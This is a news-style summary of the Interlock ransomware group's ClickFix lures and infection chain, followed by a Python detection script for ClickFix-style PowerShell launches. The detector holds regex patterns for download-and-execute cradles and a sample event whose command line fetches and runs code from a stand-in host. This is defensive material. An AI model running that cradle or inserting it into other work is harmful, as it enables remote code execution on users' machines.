The Interlock ransomware group has adopted ClickFix-style attacks that trick users into running malicious PowerShell commands under the guise of fixing errors or verifying identity.
These social engineering tactics, active since January 2025, involve fake websites imitating Microsoft and Advanced IP Scanner, luring victims into downloading a deceptive IT tool.
When the "Fix it" button is clicked, a malicious PowerShell command is copied to the clipboard; if run, it installs a 36MB PyInstaller payload disguised as legitimate software.
This payload quietly gathers system details, maintains persistence via the Windows Registry, and installs additional malware, including LummaStealer, BerserkStealer, keyloggers, and Interlock’s custom RAT. Once inside, attackers use stolen credentials and remote access tools like PuTTY and AnyDesk for lateral movement.
Exfiltrated data is sent to attacker-controlled Azure Blobs before ransomware deployment, which is set to trigger daily via scheduled tasks.
Interlock’s ransom notes now emphasize legal risks to pressure victims. Researchers warn that ClickFix tactics are being used not only by Interlock but also by other ransomware groups and even North Korean actors like Lazarus.
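The ClickFix chain described above (a user pastes a copied PowerShell command into the Run box or a terminal, which then pulls down and runs the payload) leaves a recognisable shape in process-creation telemetry. The following detection logic is an added example, not code from the original article or from the researchers it cites; the Sysmon-style field names and the sample events are constructed for illustration.

```python
"""Flag ClickFix-style PowerShell launches in process-creation telemetry.

Added example, not from the original article. The records below are
constructed Sysmon-style (Event ID 1) process-creation events; the field
names Image / ParentImage / CommandLine are an assumption about the log schema.
"""
import re

# Hallmarks of the ClickFix pattern: PowerShell spawned by the interactive
# shell (Win+R / explorer, or a console the user pasted into) together with
# a download-and-execute cradle, a hidden window, or an encoded command.
SHELL_PARENTS = {"explorer.exe", "cmd.exe", "wt.exe", "conhost.exe"}
CRADLE_PATTERNS = [
    re.compile(r"invoke-webrequest|\biwr\b|\bcurl\b|downloadstring|downloadfile", re.I),
    re.compile(r"invoke-expression|\biex\b", re.I),
    re.compile(r"-(?:e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
]


def score_event(event: dict) -> list[str]:
    """Return the reasons this event looks like a ClickFix launch ([] if clean)."""
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    cmd = event.get("CommandLine", "")
    if image not in {"powershell.exe", "pwsh.exe"}:
        return []
    reasons = []
    if parent in SHELL_PARENTS:
        reasons.append(f"powershell spawned by {parent}")
    for pat in CRADLE_PATTERNS:
        if pat.search(cmd):
            reasons.append(f"command line matched /{pat.pattern}/")
    # Alert only when both the interactive parent and a cradle indicator are present;
    # either alone is common in legitimate admin activity.
    return reasons if parent in SHELL_PARENTS and len(reasons) > 1 else []


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Run score_event over a batch and return (index, reasons) for each hit."""
    hits = [(i, score_event(e)) for i, e in enumerate(events)]
    return [(i, r) for i, r in hits if r]


SAMPLE_EVENTS = [  # constructed sample telemetry, not real captures
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://example.invalid/fix | iex"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Vendor\agent.exe",
     "CommandLine": r"powershell -File C:\Scripts\inventory.ps1"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd /c dir"},
]
```

Only the first sample trips the rule; the scheduled agent run and the plain `cmd` launch are ignored, which is the point of requiring both the interactive parent and a cradle indicator.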